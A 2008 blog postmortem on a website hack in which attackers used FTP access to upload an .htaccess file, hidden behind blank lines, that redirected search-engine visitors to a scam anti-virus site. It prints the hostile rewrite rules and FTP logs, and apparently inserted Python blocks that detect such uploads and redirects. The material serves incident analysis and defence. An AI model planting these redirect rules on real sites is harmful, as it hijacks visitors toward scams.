Hack Attack

September 12th, 2008  · stk

Randsco Hacked - Hackers gained FTP access and uploaded two .htaccess files, both attempted to redirect search engine visitors to another website. One failed, the other was successful. Read the postmortem on how approximately 15,000 Randsco visitors were hijacked over 5 full days, last month.

Hackers Hijack Search Engine Visitors for Five Days

This wasn't the first time our web server has been hacked. Last year, while we were hiking the West Coast Trail, Randsco was hacked, along with everyone else on our (then) shared server.

What is it about hackers? They seem to know when you're away on vacation and nowhere near a computer! Grrr.

Fast forward a year and we're now on a VPS host. This time, (as far as I know), it was only Randsco that was hacked.

For five full days in August - and a couple of partial days - all visitors clicking through to Randsco from a search engine, weren't connected to Randsco. Instead, they were automatically redirected to a spammy website that was selling "anti-virus software". The site loaded a "virus scanner" and a JavaScript alert window, which popped up in the middle of the screen. Closing these pop-ups was also difficult, as they spawned further pop-ups.

Visitors typing a Randsco address into their address bar weren't affected. The hackers were targeting major search engine visitors only (Google, Yahoo, AOL, etc.).

I don't know if that website was legitimately selling marginalized software or if it was a ploy to get unwary visitors to download something malicious. One is definitely worse than the other, but for me, a moot point. The fact that hackers were successfully able to redirect search engine visitors, was an egregious violation of our privacy and goal of providing helpful, relevant content and a positive visitor experience.

To learn more about how hackers gained access and what they did (a postmortem, if you will) ... carry on.

Welcome Home from Vacation!

Of course, the first we learned that hackers had broken into our web server, was after we returned from our Bowron Lakes Canoe adventure. It took a while, actually, to discover the problem. (I'm not in the habit of using a search engine to get to Randsco, the site is generally open all the time in a web browser tab, or I paste in a URL or click on a toolbar icon). For me, the site looked fine and I was completely unaware that the web server had been hacked.

The first I learned of the break-in was while reading an email from a website visitor:

When I Google on "randsco photo caption zoom" I get one result:
http://randsco.com/index.php/2006/04/10/photo_caption_zoom_version_3
which links me to a "reported attack site" error ... thought you'd like to know.
Sara

That sounded very "odd" to me and I performed an identical search. Randsco was indeed the first of a number of results, and so I clicked on the link. Wow! Suddenly I was looking at another website, a pop-up had come up on the screen, I had a difficult time clicking it closed (as it generated another pop-up) ... Oh my God! What is going on?!

There's nothing more discombobulating than discovering something is majorly awry with your website. Somehow, knowing that "anyone on the planet" who is heading to your site, is seeing something completely different than what you've intended, causes major panic and your brain to cease functioning.

What could be causing this? I couldn't imagine. (At first, I was thinking that something was wrong with Google's server. Somehow, they'd messed up with their spidering of our site or something.)

I clung to this bit of non-deductive reasoning, right up until I realized that Yahoo Search yielded the same result. Then I finally realized - we've been hacked!

 

Hacked History

The path to discovering how the hackers had managed to break in began with the discovery that the .htaccess file in the root web directory - public_html - had been deleted. Once I uploaded the last, locally saved version, everything returned to normal.

What's an .htaccess File? On a Linux web server running Apache, an .htaccess file (short for HyperText Access) is a directory-level configuration file. The [dot] is the UNIX convention for a "hidden file". .htaccess files are placed in a particular directory and contain ASCII-text directives that configure that directory (and any subdirectories). The file may contain many different configuration directives, but it's often used to specify the security restrictions for a particular directory (hence the name "access"). The .htaccess file can also be used for customized error responses, rewriting URLs, cache control, hotlink protection and many other things. See the Apache user manual on .htaccess to learn more.

"That was simple," I thought.

But, it didn't explain what was happening or why.

The next day, I conducted a more thorough investigation and realized what had happened.

Somehow, the hackers gained access to our FTP username and password. The FTP log shows that the initial hacking was done on August 8th. The hackers uploaded a 471-byte .htaccess file to our home directory, unbeknown to us.

Nothing happened as a result of this particular break-in, because the file was loaded one directory level above our webroot and I already have an .htaccess file in the webroot directory.

Apparently, the hackers realized that their .htaccess file wasn't doing anything, because on August 14th, they broke in again and overwrote the .htaccess file in the public_html directory. Here is the bit from the FTP log that shows the second (successful) break-in:

Code:

Aug 14 12:44:59 vps01 pure-ftpd: (?@97.87.189.49) [INFO] New connection from 97.87.189.49  
Aug 14 12:45:01 vps01 pure-ftpd: (?@97.87.189.49) [INFO] randsco is now logged in  
Aug 14 12:45:05 vps01 pure-ftpd: (randsco@97.87.189.49) [NOTICE] /home/randsco//public_html/.htaccess uploaded  (471 bytes, 0.69KB/sec)  
Aug 14 12:45:06 vps01 pure-ftpd: (randsco@97.87.189.49) [INFO] Logout. 
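An added example (not code from the post or from the host): a Python check over pure-ftpd log lines of the format shown above, flagging uploads of dotfiles such as .htaccess and uploads from IPs outside an owner allowlist. The first four sample lines are the excerpt above; the fifth line and the allowlist IP are constructed.

```python
import re

# pure-ftpd log lines. The first four are the excerpt from the post; the
# fifth is a constructed benign upload from the owner's usual address.
SAMPLE_LOG = """\
Aug 14 12:44:59 vps01 pure-ftpd: (?@97.87.189.49) [INFO] New connection from 97.87.189.49
Aug 14 12:45:01 vps01 pure-ftpd: (?@97.87.189.49) [INFO] randsco is now logged in
Aug 14 12:45:05 vps01 pure-ftpd: (randsco@97.87.189.49) [NOTICE] /home/randsco//public_html/.htaccess uploaded  (471 bytes, 0.69KB/sec)
Aug 14 12:45:06 vps01 pure-ftpd: (randsco@97.87.189.49) [INFO] Logout.
Aug 15 09:10:00 vps01 pure-ftpd: (randsco@192.0.2.10) [NOTICE] /home/randsco//public_html/photos/img.jpg uploaded  (120000 bytes, 300KB/sec)
"""

# Matches the [NOTICE] "... uploaded (N bytes, ...)" lines only.
UPLOAD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]+) \S+ pure-ftpd: \((?P<user>[^@]+)@(?P<ip>[^)]+)\) "
    r"\[NOTICE\] (?P<path>\S+) uploaded +\((?P<size>\d+) bytes"
)

# Addresses the site owner really uploads from (constructed allowlist).
KNOWN_IPS = {"192.0.2.10"}


def suspicious_uploads(log_text, known_ips=KNOWN_IPS):
    """Return (ip, user, path, size, reasons) for uploads worth a look:
    any dotfile upload (e.g. .htaccess) or any upload from an unknown IP."""
    hits = []
    for line in log_text.splitlines():
        m = UPLOAD_RE.match(line)
        if not m:
            continue
        name = m["path"].rsplit("/", 1)[-1]
        reasons = []
        if name.startswith("."):
            reasons.append("dotfile")
        if m["ip"] not in known_ips:
            reasons.append("unknown-ip")
        if reasons:
            hits.append((m["ip"], m["user"], m["path"], int(m["size"]), reasons))
    return hits


if __name__ == "__main__":
    for ip, user, path, size, reasons in suspicious_uploads(SAMPLE_LOG):
        print(f"{ip} {user} {path} ({size} bytes): {', '.join(reasons)}")
```

Run against the real /var/log FTP file and an accurate allowlist, the .htaccess upload on August 14th would have been flagged the same day rather than found by a visitor a week later.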

 

The code they uploaded contained a bunch of blank lines (which was why, when I edited it, after I got home, I thought it was "empty"). In fact, after the blank lines, was the redirect stuff that hijacked search engine visitors. Here's a copy of the offending .htaccess code (the links have been munged - don't want to give the wankers any unnecessary publicity).

Code:

Hackers added a bunch of blank lines to make it look like the file was "empty"



... scroll down for the code they used to hijack our visitors ...

[60 blank lines omitted]

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http: (munged) //87.248.180.90/in.html?s=sg [R,L]
Errordocument 404 http: (munged) //87.248.180.90/in.html?s=sg_err
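As an added defensive check (not code from the post), a Python audit that flags .htaccess rules whose RewriteRule or ErrorDocument target is an off-site host, and notes when such a rule is gated on the Referer header, which is the search-engine-hijack pattern above. The hijack sample mirrors the post's rules with a placeholder redirect host; the benign sample and the site host list are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed sample mirroring the hijacking file: padding, then referer-gated
# redirects. REDIRECT-HOST.example stands in for the host munged in the post.
HIJACK_HTACCESS = "\n" * 60 + """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://REDIRECT-HOST.example/in.html?s=sg [R,L]
Errordocument 404 http://REDIRECT-HOST.example/in.html?s=sg_err
"""

# Constructed legitimate file: hotlink protection plus a local error page.
BENIGN_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^https?://(www[.])?randsco[.]com/ [NC]
RewriteRule [.](jpe?g|gif|png)$ /img/hotlink.png [R,L]
ErrorDocument 404 /error404.html
"""

SITE_HOSTS = {"randsco.com", "www.randsco.com"}
REFERER_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
TARGET_RE = re.compile(r"^\s*(RewriteRule\s+\S+|ErrorDocument\s+\d{3})\s+(?P<target>\S+)", re.I)


def offsite(target, site_hosts):
    """True when target is an absolute URL whose host is not one of ours."""
    host = urlsplit(target).hostname
    return host is not None and host.lower() not in site_hosts


def audit_htaccess(text, site_hosts=SITE_HOSTS):
    """Return (line number, directive, referer_gated) for every off-site target.
    Blank lines are skipped, so padding the file does not hide the rules."""
    findings, referer_gated = [], False
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        if REFERER_RE.match(line):
            referer_gated = True  # a RewriteCond chain on Referer is being built
            continue
        m = TARGET_RE.match(line)
        if m and offsite(m["target"], site_hosts):
            findings.append((lineno, line.strip(), referer_gated))
        if m:
            referer_gated = False  # RewriteRule/ErrorDocument closes the chain
    return findings
```

Apache treats directive names case-insensitively, so the lowercase "Errordocument" in the hijack file is matched too; run this over every .htaccess under the webroot, not just the top-level one.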

 

In retrospect, the damage could have been a LOT worse than simply overwriting the .htaccess file and we're very thankful that it wasn't. Applying the "fix" was simple, but that doesn't help the 15,000 (or so) people that are estimated to have been redirected during this 5+ day period of time. To them, all we can do is apologize.

 

To FTP or Not to FTP - This is the Question

While we changed our FTP password, this is of very little reassurance that such a break-in won't happen again. We're very strict about our web security and fairly certain that the username and password weren't compromised at this end (we never FTP from public computers, don't write the password down and - even if we did - we live in a very rural location and it's unlikely that anyone would see it).

One of the main failings with FTP is that when you log in, the password is sent in plain text, across the Internet. For this reason, lots of people recommend not using FTP. "Someone using a packet sniffer would be able to glean your password!" they say.

While this is true, I think it's highly unlikely that we were targeted in such a manner. Someone would - literally - have to collect and sift through a vast amount of data, in order to harvest FTP passwords and the likelihood that Randsco was targeted in this manner, is extremely remote.

The only other thing I can think of, is that hackers are exploiting some "security hole" in our administration software (cPanel, which is a publicly-available, open-source software package). There are scads of reported cPanel security bugs, so this seems like a likely source.

In an effort to determine if Randsco was alone, I've emailed our host, to see if there were any other reports of hacked websites, using these .htaccess methods, during the same period of time.

I have looked into non-FTP methods of transferring files to our web server, so that I could turn off FTP and sidestep those security issues, but so far, I haven't found a work-flow that I like. It's not so much that shell transfers are onerous, as it is that I've come to rely on software that allows me to connect (via FTP) and work on server files directly.

I'm all for security, but when it becomes inconvenient or increases the number of hoops one has for a particular workflow, I tend to shun it. If I end up losing convenience or increase workload, because of hackers and/or spammers ... then (as far as I'm concerned) "they win". And I'm not ready to concede that battle just yet.

We'll be using FTP, but we'll also be changing passwords more often, taking lots of backups and keeping tabs on our web space.

Updated: 13-Sep-2008